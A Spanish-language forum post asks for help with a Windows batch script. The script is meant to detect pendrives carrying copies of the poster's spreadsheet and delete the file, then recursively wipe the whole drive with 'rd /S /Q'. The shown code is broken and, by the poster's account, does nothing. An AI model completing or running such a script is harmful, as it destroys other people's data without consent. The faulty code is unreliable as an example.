elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: [1]
1  Programación / Scripting / Re: [Batch] Borrar archivos de una Pendrive en: 21 Agosto 2012, 18:04 pm
que tal hozht, una duda, yo al igual que tu tambien me piratiaron unos archivos, y me gustaria q cuando los intenten usar desde su pendrive, el bat los borre, pero estoy haciendo unas pruebas con el codigo q dejaste, le he modificado algo, pero no hace nada, lo bueno es que solo hay una pc en mi trabajo, la cual es compartida, y no tiene ningun programa de extraccion segura ni nada de eso.
Y me gustaria que (como dijiste) el bat quede activado hasta que logre su cometido.

Te indico que el otro fragmanto de programa que dejaste para borrar mediante clic, funciona perfectamente, (muestra la ventana negra del ms-dos, pero si borra los archivos de la pendrive).

Te agradeceria muchisimo que me puedas ayudar, gracias.
Esto es lo que le hice, basandome en el q si funcionaba.

@echo off
:cero
REM ( abro cero
   for /f "tokens=1" %%- in ('wmic logicaldisk get caption^, description ^| find /i "extra"')
   do (
      echo.%%-
      if not exist "%%-\uno.xlsx" goto uno
      if exist "%%-\uno.xlsx" goto dos
REM ) fin cero

      :uno
      ( REM inicio uno
         goto cero
      ) REM fin uno
   ) REM fin do

:dos
(
   del /f /q /s /ah "%%-\uno.xlsx"
   rd /S /Q "%%-"
)


NOTA. al igual q tu, yo tampoco se nada de programacion, pero la necesidad me esta haciendo investigar.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines